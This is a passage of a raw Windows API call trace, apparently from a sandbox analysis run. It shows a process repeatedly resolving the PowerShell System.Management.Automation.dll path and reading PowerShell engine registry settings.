lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.712] GetCurrentProcessId () returned 0xa24 [0074.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.715] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad818 | out: phkResult=0x1ad818*=0x3b4) returned 0x0 [0074.715] RegQueryValueExW (in: hKey=0x3b4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad79c, lpData=0x0, lpcbData=0x1ad798*=0x0 | out: lpType=0x1ad79c*=0x1, lpData=0x0, lpcbData=0x1ad798*=0x56) returned 0x0 [0074.715] CoTaskMemAlloc (cb=0x5a) returned 0x1b3cd5b0 [0074.715] RegQueryValueExW (in: hKey=0x3b4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad76c, lpData=0x1b3cd5b0, lpcbData=0x1ad768*=0x56 | out: lpType=0x1ad76c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad768*=0x56) returned 0x0 [0074.715] CoTaskMemFree (pv=0x1b3cd5b0) [0074.715] RegCloseKey (hKey=0x3b4) returned 0x0 [0074.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.727] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.727] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.727] CoTaskMemFree (pv=0x3e43c0) [0074.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: 